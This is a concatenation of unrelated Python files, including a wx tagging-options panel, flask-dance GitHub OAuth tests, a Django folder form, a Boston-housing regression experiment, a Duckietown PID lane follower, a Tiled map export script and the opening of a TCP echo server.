            """Re-render every row in the path list (tags may have changed)."""
            self._paths_list.UpdateDatas()
        
        def ScheduleRefreshFileList( self ):
            """Debounce list refreshes: cancel any pending job, schedule one in 0.5s."""
            if self._schedule_refresh_file_list_job is not None:
                self._schedule_refresh_file_list_job.Cancel()
                self._schedule_refresh_file_list_job = None
            self._schedule_refresh_file_list_job = HG.client_controller.CallLaterWXSafe( self, 0.5, self.RefreshFileList )
class EditFilenameTaggingOptionPanel( ClientGUIScrolledPanels.EditPanel ):
    """
    Edit panel for a FilenameTaggingOptions object, with a live preview:
    the user types an example path and sees the tags it would produce.
    """
    
    def __init__( self, parent, service_key, filename_tagging_options ):
        """
        :param parent: parent wx window
        :param service_key: tag service the options apply to
        :param filename_tagging_options: the options object being edited
        """
        ClientGUIScrolledPanels.EditPanel.__init__( self, parent )
        self._service_key = service_key
        self._example_path_input = wx.TextCtrl( self )
        self._example_output = wx.TextCtrl( self )
        # no accompanying file list here, so per-file/#-numbering UI is hidden
        self._filename_tagging_options_panel = FilenameTaggingOptionsPanel( self, self._service_key, self.ScheduleRefreshTags, filename_tagging_options = filename_tagging_options, present_for_accompanying_file_list = False )
        # pending debounced preview-refresh job, if any
        self._schedule_refresh_tags_job = None
        #
        self._example_path_input.SetValue( 'enter example path here' )
        # output box is read-only display
        self._example_output.Disable()
        #
        vbox = wx.BoxSizer( wx.VERTICAL )
        vbox.Add( self._example_path_input, CC.FLAGS_EXPAND_PERPENDICULAR )
        vbox.Add( self._example_output, CC.FLAGS_EXPAND_PERPENDICULAR )
        vbox.Add( self._filename_tagging_options_panel, CC.FLAGS_EXPAND_BOTH_WAYS )
        self.SetSizer( vbox )
        #
        self._example_path_input.Bind( wx.EVT_TEXT, self.EventText )
    
    def EventText( self, event ):
        """Example path changed: schedule a preview refresh."""
        self.ScheduleRefreshTags()
    
    def GetValue( self ):
        """Return a FilenameTaggingOptions built from the current UI state."""
        return self._filename_tagging_options_panel.GetFilenameTaggingOptions()
    
    def RefreshTags( self ):
        """Recompute the preview tags for the example path and show them."""
        example_path_input = self._example_path_input.GetValue()
        filename_tagging_options = self.GetValue()
        try:
            tags = filename_tagging_options.GetTags( self._service_key, example_path_input )
        except:
            # a half-typed regex can blow up; show a placeholder instead of crashing
            tags = [ 'could not parse' ]
        self._example_output.SetValue( ', '.join( tags ) )
    
    def ScheduleRefreshTags( self ):
        """Debounce preview refreshes: cancel any pending job, schedule one in 0.5s."""
        if self._schedule_refresh_tags_job is not None:
            self._schedule_refresh_tags_job.Cancel()
            self._schedule_refresh_tags_job = None
        self._schedule_refresh_tags_job = HG.client_controller.CallLaterWXSafe( self, 0.5, self.RefreshTags )
class TagImportOptionsButton( ClientGUICommon.BetterButton ):
    """
    A button that holds a TagImportOptions object, summarises it in its
    tooltip, and opens an edit dialog when clicked. An optional callable is
    notified whenever the held options change.
    """
    
    def __init__( self, parent, namespaces, tag_import_options, update_callable = None, show_url_options = True ):
        ClientGUICommon.BetterButton.__init__( self, parent, 'tag import options', self._EditOptions )
        self._show_url_options = show_url_options
        self._update_callable = update_callable
        self._tag_import_options = tag_import_options
        self._namespaces = namespaces
        self._SetToolTip()
    
    def _EditOptions( self ):
        """Open the edit dialog; commit the result on OK."""
        with ClientGUITopLevelWindows.DialogEdit( self, 'edit tag import options' ) as edit_dialog:
            edit_panel = ClientGUIScrolledPanelsEdit.EditTagImportOptionsPanel( edit_dialog, self._namespaces, self._tag_import_options, show_url_options = self._show_url_options )
            edit_dialog.SetPanel( edit_panel )
            if edit_dialog.ShowModal() != wx.ID_OK:
                return
            self._SetValue( edit_panel.GetValue() )
    
    def _SetToolTip( self ):
        """Refresh the tooltip from the held options' summary."""
        self.SetToolTip( self._tag_import_options.GetSummary( self._show_url_options ) )
    
    def _SetValue( self, tag_import_options ):
        """Store new options, update the tooltip, and notify any listener."""
        self._tag_import_options = tag_import_options
        self._SetToolTip()
        if self._update_callable is not None:
            self._update_callable( self._tag_import_options )
    
    def GetValue( self ):
        """Return the currently held TagImportOptions."""
        return self._tag_import_options
    
    def SetNamespaces( self, namespaces ):
        """Replace the namespaces offered by the edit dialog."""
        self._namespaces = namespaces
    
    def SetValue( self, tag_import_options ):
        """Public setter: delegates to _SetValue (tooltip + listener update)."""
        self._SetValue( tag_import_options )
|
from __future__ import unicode_literals
import pytest
import responses
from urlobject import URLObject
from flask import Flask
from flask_dance.contrib.github import make_github_blueprint, github
from flask_dance.consumer import OAuth2ConsumerBlueprint
from flask_dance.consumer.storage import MemoryStorage
@pytest.fixture
def make_app():
    "A callable to create a Flask app with the GitHub provider"
    def _make_app(*args, **kwargs):
        # args/kwargs are forwarded verbatim to make_github_blueprint, so
        # individual tests can supply client_id, client_secret, storage, etc.
        app = Flask(__name__)
        # flask-dance stores OAuth state in the session, which needs a
        # secret key; the value is irrelevant for tests
        app.secret_key = "whatever"
        blueprint = make_github_blueprint(*args, **kwargs)
        app.register_blueprint(blueprint)
        return app
    return _make_app
def test_blueprint_factory():
    """The GitHub factory returns a fully configured OAuth2ConsumerBlueprint."""
    blueprint = make_github_blueprint(
        client_id="foo", client_secret="bar", scope="user:email", redirect_to="index"
    )
    assert isinstance(blueprint, OAuth2ConsumerBlueprint)
    # OAuth2 endpoints point at github.com
    assert blueprint.authorization_url == "https://github.com/login/oauth/authorize"
    assert blueprint.token_url == "https://github.com/login/oauth/access_token"
    # client configuration is threaded through to the requests session
    assert blueprint.session.base_url == "https://api.github.com/"
    assert blueprint.session.client_id == "foo"
    assert blueprint.client_secret == "bar"
    assert blueprint.session.scope == "user:email"
def test_load_from_config(make_app):
    """Client credentials can come from app.config instead of factory arguments."""
    app = make_app()
    app.config["GITHUB_OAUTH_CLIENT_ID"] = "foo"
    app.config["GITHUB_OAUTH_CLIENT_SECRET"] = "bar"
    # hitting the login view should redirect to GitHub with our client_id
    resp = app.test_client().get("/github")
    redirect_url = URLObject(resp.headers["Location"])
    assert redirect_url.query.dict.get("client_id") == "foo"
@responses.activate
def test_context_local(make_app):
    """The module-level `github` proxy resolves to the blueprint session of
    whichever app handles the current request."""
    responses.add(responses.GET, "https://google.com")
    # set up two apps with two different set of auth tokens
    app1 = make_app(
        "foo1",
        "bar1",
        redirect_to="url1",
        storage=MemoryStorage({"access_token": "app1"}),
    )
    app2 = make_app(
        "foo2",
        "bar2",
        redirect_to="url2",
        storage=MemoryStorage({"access_token": "app2"}),
    )
    # outside of a request context, referencing functions on the `github` object
    # will raise an exception
    with pytest.raises(RuntimeError):
        github.get("https://google.com")
    # inside of a request context, `github` should be a proxy to the correct
    # blueprint session
    with app1.test_request_context("/"):
        app1.preprocess_request()
        github.get("https://google.com")
    # first recorded call must carry app1's token
    request = responses.calls[0].request
    assert request.headers["Authorization"] == "Bearer app1"
    with app2.test_request_context("/"):
        app2.preprocess_request()
        github.get("https://google.com")
    # second recorded call must carry app2's token
    request = responses.calls[1].request
    assert request.headers["Authorization"] == "Bearer app2"
|
from datetime import datetime
from django.contrib.sessions.backends import file
from mutant.contrib.boolean.models import NullBooleanFieldDefinition
from mutant.contrib.file.models import FilePathFieldDefinition
from mutant.contrib.numeric.models import FloatFieldDefinition, BigIntegerFieldDefinition
from mutant.contrib.temporal.models import DateTimeFieldDefinition
from mutant.contrib.text.models import TextFieldDefinition
# Maps a Python type (used as a dict key) to the mutant field-definition model
# that should store values of that type in a dynamically built Django model.
# NOTE(review): `file` here is the django.contrib.sessions.backends.file
# *module* imported above, apparently used as a stand-in key for file-ish
# values (the `file` builtin does not exist on Python 3) -- confirm callers
# actually look this key up with that module object.
ATTRIBUTE_TYPES = {
    str: TextFieldDefinition,
    float: FloatFieldDefinition,
    bool: NullBooleanFieldDefinition,
    int: BigIntegerFieldDefinition,
    file: FilePathFieldDefinition,
    datetime: DateTimeFieldDefinition,
    # Remaining mutant field definitions, kept for reference but not yet mapped:
    # ('varchar', mutant.contrib.text.models.CharFieldDefinition),
    #
    # ('integer', mutant.contrib.numeric.models.BigIntegerFieldDefinition),
    # ('small_integer', mutant.contrib.numeric.models.SmallIntegerFieldDefinition),
    # ('float', mutant.contrib.numeric.models.FloatFieldDefinition),
    #
    # ('null_boolean', mutant.contrib.boolean.models.NullBooleanFieldDefinition),
    # ('boolean', mutant.contrib.boolean.models.BooleanFieldDefinition),
    #
    # ('file', mutant.contrib.file.models.FilePathFieldDefinition),
    #
    # ('foreign_key', mutant.contrib.related.models.ForeignKeyDefinition),
    # ('one_to_one', mutant.contrib.related.models.OneToOneFieldDefinition),
    # ('many_to_many', mutant.contrib.related.models.ManyToManyFieldDefinition),
    #
    # ('ip_generic', mutant.contrib.web.models.GenericIPAddressFieldDefinition),
    # ('ip', mutant.contrib.web.models.IPAddressFieldDefinition),
    # ('email', mutant.contrib.web.models.EmailFieldDefinition),
    # ('url', mutant.contrib.web.models.URLFieldDefinition),
    #
    # ('date', mutant.contrib.temporal.models.DateFieldDefinition),
    # ('time', mutant.contrib.temporal.models.TimeFieldDefinition),
    # ('datetime', mutant.contrib.temporal.models.DateTimeFieldDefinition),
}
|
import os
import sys
import json
def get_config_parser():
    """
    Return the ConfigParser class appropriate for the running interpreter.

    On Python 3 this is configparser.ConfigParser; on Python 2 it is
    ConfigParser.ConfigParser (where module and class share a name).
    """
    try:
        # Python 3 layout
        from configparser import ConfigParser
        return ConfigParser
    except ImportError:
        # Python 2 fallback
        import ConfigParser
        return ConfigParser.ConfigParser
# Resolve the right ConfigParser class for this interpreter, then load the
# RingCentral-style credentials from credentials.ini in the working directory.
ConfigParser = get_config_parser()
config = ConfigParser()
# NOTE: config.read silently yields an empty parser if the file is missing,
# in which case the config.get calls below raise NoSectionError.
config.read('credentials.ini')
USERNAME = config.get('Credentials', 'USERNAME')
EXTENSION = config.get('Credentials', 'EXTENSION')
PASSWORD = config.get('Credentials', 'PASSWORD')
APP_KEY = config.get('Credentials', 'APP_KEY')
APP_SECRET = config.get('Credentials', 'APP_SECRET')
SERVER = config.get('Credentials', 'SERVER')
MOBILE = config.get('Credentials', 'MOBILE')
from __future__ import absolute_import, unicode_literals
import logging
from django import forms
from django.utils.translation import ugettext_lazy as _
from acls.models import AccessControlList
from .models import Folder
logger = logging.getLogger(__name__)
class FolderListForm(forms.Form):
    """
    Form with a single 'folders' multiple-choice field, limited to the
    folders the given user can access under the given permission.
    """
    def __init__(self, *args, **kwargs):
        # Strip our custom keyword arguments before Form sees the rest.
        field_help_text = kwargs.pop('help_text', None)
        required_permission = kwargs.pop('permission', None)
        candidate_folders = kwargs.pop('queryset', Folder.objects.all())
        requesting_user = kwargs.pop('user', None)
        logger.debug('user: %s', requesting_user)
        super(FolderListForm, self).__init__(*args, **kwargs)
        # Restrict the candidates to what the ACLs allow this user to see.
        allowed_folders = AccessControlList.objects.filter_by_access(
            required_permission, requesting_user, queryset=candidate_folders
        )
        self.fields['folders'] = forms.ModelMultipleChoiceField(
            help_text=field_help_text, label=_('Folders'),
            queryset=allowed_folders, required=False,
            widget=forms.SelectMultiple(attrs={'class': 'select2'})
        )
|
import sys
import os
import socket
import json
from pathlib import Path
from docker import DockerClient
# Run `terraform output` inside the Azure terraform container and re-emit the
# Panorama IP addresses as a JSON dict on stdout for the calling skillet.
# Environment for the containerised terraform run; HOME keeps terraform's
# dotfiles inside the container user's home.
variables = dict(TF_IN_AUTOMATION='True', HOME='/home/terraform')
client = DockerClient()
# Working directory for terraform: ../terraform/azure/panorama/ relative to cwd
path = Path(os.getcwd())
wdir = str(path.parents[0])+"/terraform/azure/panorama/"
# Capture the External IP address of Panorama from the Terraform output
# (mounts the shared terraform-azure volume for Azure credentials and reuses
# this container's volumes so the terraform state is visible)
eip = json.loads(client.containers.run('paloaltonetworks/terraform-azure', 'terraform output -json -no-color', auto_remove=True,
                                       volumes={'terraform-azure': {'bind': '/home/terraform/.azure/', 'mode': 'rw'}},
                                       volumes_from=socket.gethostname(), working_dir=wdir, user=os.getuid(),
                                       environment=variables).decode('utf-8'))
# Pull the public and private IPs of both Panorama instances out of the
# terraform output structure ({name: {"value": ...}})
panorama_ip = (eip['primary_eip']['value'])
panorama_private_ip = (eip['primary_private_ip']['value'])
secondary_ip = (eip['secondary_eip']['value'])
secondary_private_ip = (eip['secondary_private_ip']['value'])
# Re-shape into the flat dict the caller expects and print as JSON
poutput = dict()
poutput.update(Primary_IP=panorama_ip)
poutput.update(Secondary_IP=secondary_ip)
poutput.update(Primary_Private_IP=panorama_private_ip)
poutput.update(Secondary_Private_IP=secondary_private_ip)
print(json.dumps(poutput))
sys.exit(0)
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2018/10/1316:45
# @Author : DaiPuWei
# E-Mail : [email protected]
# blog : https://blog.csdn.net/qq_30091945
# @Site : 中国民航大学北教25实验室506
# @File : BostonHousing.py
# @Software: PyCharm
from LinearRegression.LinearRegression import LinearRegression
from LocalWeightedLinearRegression.LocalWeightedLinearRegression \
import LocalWeightedLinearRegression
from sklearn.model_selection import train_test_split
from sklearn.datasets import load_boston
import matplotlib as mpl
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
def Merge(data, col):
    """Build a DataFrame whose columns are the rows of *data*.

    :param data: sequence of equal-length 1-D sequences, one per column
    :param col: column names, one per entry of ``data``
    :return: ``pandas.DataFrame`` with ``col`` as its columns
    """
    column_matrix = np.transpose(np.array(data))
    return pd.DataFrame(column_matrix, columns=col)
def run_main():
    """
    Main driver: compares ordinary linear regression with locally weighted
    linear regression (LWLR) on the Boston housing data, then saves the
    predictions, errors and plots to disk.
    """
    # Load the data; it is split into training and test sets further below
    InputData, Result = load_boston(return_X_y=True)
    # For simplicity keep only feature index 5: the average number of rooms
    InputData = np.array(InputData)[:,5]
    # Save the raw dataset to Excel
    Data = Merge([InputData,Result],['平均房间数目','房价'])
    Data.to_excel('./原始数据.xlsx')
    # Reshape the inputs and the true house prices into column vectors
    InputData = InputData.reshape((len(InputData), 1))
    Result = np.array(Result).reshape((len(Result), 1))
    # Configure Matplotlib so Chinese labels render correctly in the figures
    mpl.rcParams['font.sans-serif'] = [u'simHei']
    mpl.rcParams['axes.unicode_minus'] = False
    # Split into training and test sets; the test set is 10% of the data
    train_data,test_data,train_result,test_result = \
        train_test_split(InputData,Result,test_size=0.1,random_state=10)
    # Visualize the test set with a scatter plot and save the figure
    col = ['真实房价']
    plt.scatter(test_data,test_result,alpha=0.5,c='b',s=10)
    plt.grid(True)
    plt.legend(labels = col,loc='best')
    plt.xlabel("房间数")
    plt.ylabel("真实房价")
    plt.savefig("./测试集可视化.jpg",bbox_inches='tight')
    #plt.show()
    plt.close()
    # Sort the test data (and its matching true prices) by room count
    index = np.argsort(test_data.T[0])
    test_data_ = test_data[index]
    test_result_ = test_result[index]
    # Build the linear regression and locally weighted regression models
    # Bandwidth coefficients: four sub-unit values followed by 1..200
    K = [0.001,0.01,0.1,0.5]
    K.extend(list(np.arange(1,201)))
    K = np.array(K)
    # Linear regression model solved via the normal equation
    linearregression = LinearRegression(train_data,train_result)
    # Locally weighted linear regression model
    lwlr = LocalWeightedLinearRegression(train_data,train_result)
    # Predict on the test set
    # Solve the linear-regression parameters with the normal equation
    linearregression.getNormalEquation()
    # With the fitted parameters, predict on the test set; predictions go
    # into predict_LR and the squared errors into loss_LR
    predict_LR = linearregression.predict(test_data_)
    loss_LR = ((predict_LR-test_result_)**2).T[0]
    #print(np.shape(predict_LR))
    #print(np.shape(loss_LR))
    # LWLR weights differ for every test point, so solving for the best
    # parameters and predicting happen together while iterating over the
    # test set.  Predictions are collected in predict_LWLR and the squared
    # errors in loss_LWLR, one entry per bandwidth k.
    predict_LWLR = []
    loss_LWLR = []
    for k in K:
        predict = lwlr.predict_NormalEquation(test_data_,k)
        #print(np.shape(predict))
        predict_LWLR.append(predict)
        loss_LWLR.append(((predict-test_result_.T[0])**2))
    #print(np.shape(predict_LWLR))
    #print(np.shape(loss_LWLR))
    # Visualize the linear-regression predictions against the test set
    plt.scatter(test_data,test_result,alpha=0.5,c='b',s=10)
    plt.grid(True)
    plt.plot(test_data_.T[0], predict_LR,'r')
    plt.legend(labels = ['线性回归'],loc='best')
    plt.xlabel("房间数")
    plt.ylabel("房价")
    plt.savefig("./测试集可视化"+"线性回归.jpg",bbox_inches='tight')
    plt.show()
    plt.close()
    # Plot each LWLR prediction at its bandwidth k
    for (predict_lwlr,k) in zip(predict_LWLR,K):
        plt.scatter(test_data, test_result, alpha=0.5, c='b', s=10)
        plt.plot(test_data_.T[0], predict_lwlr,'r')
        plt.grid(True)
        plt.legend(labels=["k="+str(k)], loc='best')
        plt.xlabel("房间数")
        plt.ylabel("房价")
        plt.savefig("./测试集可视化局部加权回归"+str(k)+".jpg", bbox_inches='tight')
        plt.close()
    # Visualize a subset of the predictions
    # Bandwidths of the LWLR models chosen for display
    K_ = np.array([0.1,0.5,2,5,12,25,50,200])
    # NOTE(review): with K = [0.001, 0.01, 0.1, 0.5, 1..200], the indices
    # 3,4,6,9,16,29,54,203 used below correspond to k = 0.5,1,3,6,13,26,51,200,
    # which matches the K_ labels above only for the last entry.  Confirm the
    # intended indices (k = 0.1,0.5,2,5,12,25,50,200 would be 2,3,5,8,15,28,53,203).
    predict_LWLR_tmp = [predict_LWLR[3],predict_LWLR[4],predict_LWLR[6],
                        predict_LWLR[9],predict_LWLR[16],predict_LWLR[29],
                        predict_LWLR[54],predict_LWLR[203]]
    # Plot the linear-regression prediction in the first subplot
    fig = plt.figure()
    ax = fig.add_subplot(331)
    ax.scatter(test_data,test_result,alpha=0.5,c='b',s=10)
    ax.grid(True)
    ax.plot(test_data_, predict_LR,'r')
    ax.legend(labels = ['线性回归'],loc='best')
    plt.xlabel("房间数")
    plt.ylabel("房价")
    # Plot each selected LWLR prediction in the following subplots
    for (index,(predict_lwlr, k)) in enumerate(zip(predict_LWLR_tmp, K_)):
        # Draw this prediction in subplot index+2 of the 3x3 grid
        ax = fig.add_subplot(331 + index + 1)
        ax.scatter(test_data, test_result, alpha=0.5, c='b', s=10)
        ax.grid(True)
        ax.plot(test_data_.T[0], predict_lwlr, 'r')
        ax.legend(labels=['k='+str(k)], loc='best')
        plt.xlabel("房间数")
        plt.ylabel("房价")
    # Use a tight layout between the subplots
    plt.tight_layout()
    plt.savefig("./部分预测结果.jpg", bbox_inches='tight')
    plt.close()
    # Save the predictions of both models for every bandwidth
    # Column names
    col = ['真实房价','LinearRegression']
    # Complete the column names, one entry per bandwidth
    for k in K:
        col.append('K=' + str(k))
    data = [test_result_.T[0],predict_LR]
    # Append the prediction of each LWLR bandwidth
    for predict_lwlr in predict_LWLR:
        data.append(predict_lwlr)
    result = Merge(data,col)
    # Save the predictions to Excel
    result.to_excel("./线性回归与局部加权线性回归预测对比.xlsx")
    # Save summary statistics of the predictions to Excel
    result.describe().to_excel("./线性回归与局部加权线性回归预测对比统计信息.xlsx")
    # Compute the squared errors of both models
    # Column names
    col = ['LinearRegression']
    # Complete the column names, one entry per bandwidth
    for k in K:
        col.append('K=' + str(k))
    # Errors of linear regression and of each LWLR bandwidth
    MSE = [loss_LR]
    # Append each LWLR loss
    for loss in loss_LWLR:
        MSE.append(loss)
    # Build the DataFrame
    result = Merge(MSE,col)
    # Save the squared errors to Excel
    result.to_excel("./线性回归与局部加权线性回归预测的均方误差.xlsx")
    # Save summary statistics of the errors to Excel
    information = result.describe()
    information.to_excel("./线性回归与局部加权线性回归预测的均方误差对比统计信息.xlsx")
    # Visualize the mean squared error and prediction std of LWLR over the
    # integer bandwidths.  Columns 0-4 are LinearRegression and the k < 1
    # bandwidths, so slicing [5:] keeps exactly the k = 1..200 columns.
    K = list(np.arange(1, 201))
    col = ["LWLR-MSE", "LWLR-std"]
    LWLR_MSE = list(information.loc['mean'])[5:]
    LWLR_std = list(information.loc['std'])[5:]
    plt.plot(K, LWLR_MSE,'b')
    plt.plot(K, LWLR_std, 'c-.')
    plt.grid(True)
    plt.legend(labels=col, loc='best')
    plt.xlabel("带宽系数")
    plt.savefig("./局部加权线性回归的预测均方误差和标准差.jpg", bbox_inches='tight')
    #plt.show()
    plt.close()
# Run the experiment only when executed as a script (not on import).
if __name__ == '__main__':
    run_main()
# Largest 32-bit signed integer; usable as an "effectively infinite" sentinel.
MAXINT = 2 ** 31 - 1
# NOTE(review): presumably a floor applied to cost values before taking a
# logarithm, to avoid log(0) -- confirm against the callers.
MINIMAL_COST_FOR_LOG = 0.00001
# Largest unsigned 16-bit value.
# NOTE(review): presumably an upper bound for cutoff values -- confirm.
MAX_CUTOFF = 65535
# NOTE(review): presumably the number of trees for an ensemble model -- confirm.
N_TREES = 10
|
'''
Read a student ID (guaranteed to be eight characters long) and decide
whether it belongs to the Faculty of Information: the 3rd and 4th
characters must be '1' and '6'.  Prints 'yes' or 'no' accordingly.
'''
iden = input()
# Characters 3-4 (0-based slice [2:4]) hold the faculty code.
if iden[2:4] == '16':
    print('yes')
else:
    print('no')
|
import logging
import sys
# One-line log format: timestamp, level, logger name, message.
LOG_FORMAT = "%(asctime)s [%(levelname)s] %(name)s: %(message)s"
LOG_LEVEL = logging.DEBUG
LOG_STREAM = sys.stdout
# Configure the root logger once at import time; records go to stdout.
logging.basicConfig(format=LOG_FORMAT, level=LOG_LEVEL, stream=LOG_STREAM)
# Module-level logger.  setLevel is redundant with basicConfig's level but
# makes this logger's threshold explicit.
logger = logging.getLogger(__name__)
logger.setLevel(LOG_LEVEL)
|
import sys
sys.path.append("../")
from duckietown_rl.gym_duckietown.simulator import Simulator
from tutorials.helpers import SteeringToWheelVelWrapper
import csv
# Converts [speed, steering] commands to wheel velocities [leftWheelV, rightWheelV]
wrapper = SteeringToWheelVelWrapper()
# Environment names whose drivable-tile coordinates will be collected
map_names = ["zigzag_dists", "4way", "loop_empty", "small_loop"]
# map name -> list of visited tile coordinates
tile_coords = {map_name: [] for map_name in map_names}
# NOTE(review): the loop variable shadows the builtin `map`; harmless here
# but worth renaming.
for map in map_names:
    env = Simulator(seed=123,
                    map_name=map,  # Choose a map name to start with
                    max_steps=5000001,  # Max. # of steps before the env resets itself
                    domain_rand=True,  # If true, applies domain randomization
                    camera_width=640,  # Camera width for rendering
                    camera_height=480,  # Camera height for rendering
                    accept_start_angle_deg=4,  # Max start angle, in degrees, w.r.t. the right lane's center
                    full_transparency=True,  # If true, makes all env info accessible
                    distortion=True,  # Distort observations to look real-world (sim-2-real)
                    randomize_maps_on_reset=False,  # If true, maps are randomly chosen after each episode
                    draw_curve=False,  # Draws the right lane's center curve
                    draw_bbox=False)  # Renders the environment in top-down view
    # Reset environment for a fresh start & initialize variables
    obs = env.reset()
    # env.render()
    # Run 1 episode of 2000 steps per map; 2000 is enough for the PID
    # controller to finish the map
    EPISODES, STEPS = 1, 2000
    for episode in range(0, EPISODES):
        # The 10 most recent angle errors (used for the integral term)
        prev_angles = [0] * 10
        # Previous angle value
        prev_angle = 0
        # Tile coordinates visited during this episode
        _tile_coords = []
        for steps in range(0, STEPS):
            # Position of the agent relative to the right lane's center
            lane_pose = env.get_lane_pos2(env.cur_pos, env.cur_angle)
            # Distance from the right lane's center
            distance_to_road_center = lane_pose.dist
            # Angle, in radians, to turn in order to align with the right lane
            angle_from_straight_in_rads = lane_pose.angle_rad
            # PID gains
            k_p, k_d, k_i = 17, 9, 0.1  # 33, 8, 0.1
            # Drive faster the better the agent is aligned with the lane
            if -0.5 < lane_pose.angle_deg < 0.5:
                speed = 1
            elif -1 < lane_pose.angle_deg < 1:
                speed = 0.9
            elif -2 < lane_pose.angle_deg < 2:
                speed = 0.8
            elif -10 < lane_pose.angle_deg < 10:
                speed = 0.5
            else:
                speed = 0.3
            # Append the newest angle error to the window...
            prev_angles.append(abs(prev_angle - lane_pose.angle_deg))
            # ...and drop the oldest one
            prev_angles.pop(0)
            # Remember the current angle for the next step's error
            prev_angle = lane_pose.angle_deg
            # PID control law: proportional on lateral offset, derivative on
            # heading, integral on the recent angle errors
            steering = k_p*distance_to_road_center + k_d*angle_from_straight_in_rads + k_i * sum(prev_angles)
            # Convert [speed, steering] to wheel velocities
            action = wrapper.convert([speed, steering])
            # Apply the action and gather info
            obs, reward, done, info = env.step(action)
            # env.render()
            i, j = env.get_grid_coords(env.cur_pos)
            tile_coord = env._get_tile(i, j)['coords']
            # Record each tile coordinate only once
            if tile_coord not in _tile_coords:
                _tile_coords.append(tile_coord)
            # Uncomment to run frame-by-frame
            # cv2.imshow("obs", obs)
            # if cv2.waitKey() & 0xFF == ord('q'):
            #     break
        # Store the episode's tile coords if they differ from what is saved
        if tile_coords[env.map_name] != _tile_coords:
            tile_coords[env.map_name] = _tile_coords
        env.reset()
    print(map)
# Dump the collected coordinates as CSV, one row per map.
# NOTE(review): the file handle from open() is never closed explicitly.
w = csv.writer(open("tile_coordinates.csv", "w"))
for key, val in tile_coords.items():
    w.writerow([key, val])
|
#!/usr/bin/env python3
"""
Script exports map, tilesets
Debuggs map in Tiled program by swapping tilesets
Directory layout of Tiled and Game asset folder
must exactly match to not break referance links
"""
import os
from shutil import copy
from sys import argv
# map_dir: where the game map asset resides
map_dir = "/home/rubsz/Documents/programming/game_dev/Tides_of_war/asset/img/map"
# character_dir: where the game character sprite assets reside
character_dir = "/home/rubsz/Tides_of_war/asset/img/character"
# Sub-directory names for regular and debugging tilesets
tileset_dir = "tilesets"
dtileset_dir = "debug_tilesets"
# debug_name: filename prefix marking that the resource dir currently holds
# debugging tilesets
debug_name = "DEBUG-"
# Relevant file extensions: image, Tiled map, Tiled tileset
img_ext = ".png"
map_ext = ".tmx"
tileset_ext = ".tsx"
if len(argv) > 1:
    arg = argv[1]
    # NOTE(review): `and` binds tighter than `or`, so this reads as
    # (isfile(arg) and not *.tmx) or (isdir(arg) and endswith "tilesets");
    # presumably the intended grouping, but confirm.
    if os.path.isfile(arg) and not arg.endswith(map_ext) or os.path.isdir(arg) and arg.endswith(tileset_dir):
        print("\n--> EXECUTE IN MAP SCENE\n--> ABORTING OPERATION")
    elif os.path.isdir(arg) and len(argv) == 3:
        # This is for swapping tilesets
        arg = os.path.join(arg, tileset_dir)
        if argv[2] == "DEBUG":
            dtileset_dir = os.path.join(arg, dtileset_dir)
            # debug stays True when we are about to switch TO the debug
            # tilesets; any file already carrying the DEBUG- prefix means we
            # are in debug mode and should switch back.
            debug = True
            for thing in os.listdir(arg):
                if thing.startswith(debug_name):
                    debug = False
                    break
            if not debug:
                # Restore the originals by stripping the DEBUG- prefix
                for tileset in os.listdir(arg):
                    if tileset.endswith(img_ext) and tileset.startswith(debug_name):
                        os.rename(os.path.join(arg, tileset), os.path.join(arg, tileset[len(debug_name):]))
            else:
                # Park the originals under the DEBUG- prefix, then copy the
                # debug tilesets in under the original names
                for tileset in os.listdir(arg):
                    if tileset.endswith(img_ext):
                        os.rename(os.path.join(arg, tileset), os.path.join(arg, debug_name + tileset))
                for dtileset in os.listdir(dtileset_dir):
                    if os.path.isfile(os.path.join(dtileset_dir, dtileset)):
                        copy(os.path.join(dtileset_dir, dtileset), os.path.join(arg, dtileset))
            print("\n--> DEBUG MAP: %s\n--> PRESS (CTRL-T) TO REFRESH IF HASN'T" % debug)
        elif os.path.isdir(argv[2]):
            # This is for exporting tilesets
            map_dir = os.path.join(map_dir, tileset_dir)
            if not os.path.isdir(map_dir):
                os.mkdir(map_dir)
            for tileset in os.listdir(arg):
                if os.path.isfile(os.path.join(arg, tileset)):
                    copy(os.path.join(arg, tileset), map_dir)
            # Second argument: character directory holding per-race .tsx
            # tilesets to export next to the sprites
            arg = argv[2]
            for race in os.listdir(arg):
                if os.path.isdir(os.path.join(arg, race)):
                    for thing in os.listdir(os.path.join(arg, race)):
                        if thing.endswith(tileset_ext):
                            copy(os.path.join(arg, race, thing), os.path.join(character_dir, race, thing))
            print("\n--> TILESETS EXPORTED TO: %s" % map_dir)
    else:
        # This is for exporting the map itself
        copy(arg, map_dir)
        print("\n--> MAP EXPORTED TO: %s" % map_dir)
else:
    print("\n--> NEED ARGS FROM TILED TO RUN")
|
from GridGenerator import generate_grid, coord_to_grid
from Discretizer import grid_to_coords |
#!/usr/bin/env python
import os
import sys
import datetime
import time
import socket
def listen_on_tcp_port():
    """Run a simple echo server for processing messages over ``TCP``.

    Accepts one connection at a time, logs the first message received from
    each client and echoes it back.  Configured entirely through
    environment variables:

    ``LISTEN_ON_HOST`` - listen on this host ip address
    ``LISTEN_ON_PORT`` - listen on this ``TCP`` port
    ``LISTEN_BACKLOG`` - pending-connection backlog for ``listen()``
    ``LISTEN_SIZE`` - read packets up to this size
    ``LISTEN_SLEEP`` - sleep this number of seconds after an empty read
    ``LISTEN_SHUTDOWN_HOOK`` - shut down when this file appears on disk
    """
    # str.strip() already removes whitespace from both ends, so the original
    # ``.strip().lstrip()`` chains were redundant.
    host = os.getenv(
        "LISTEN_ON_HOST",
        "127.0.0.1").strip()
    port = int(os.getenv(
        "LISTEN_ON_PORT",
        "80").strip())
    backlog = int(os.getenv(
        "LISTEN_BACKLOG",
        "5").strip())
    size = int(os.getenv(
        "LISTEN_SIZE",
        "1024").strip())
    sleep_in_seconds = float(os.getenv(
        "LISTEN_SLEEP",
        "0.5").strip())
    shutdown_hook = os.getenv(
        "LISTEN_SHUTDOWN_HOOK",
        "/tmp/shutdown-listen-server-{}-{}".format(
            host,
            port)).strip()
    # Refuse to start while a stale shutdown hook exists, otherwise the
    # server would stop again immediately after the first connection.
    if os.path.exists(shutdown_hook):
        print(("Please remove the shutdown hook file: "
               "\nrm -f {}").format(shutdown_hook))
        sys.exit(1)
    now = datetime.datetime.now().isoformat()
    print(("{} - Starting Server address={}:{} "
           "backlog={} size={} sleep={} shutdown={}").format(
               now,
               host,
               port,
               backlog,
               size,
               sleep_in_seconds,
               shutdown_hook))
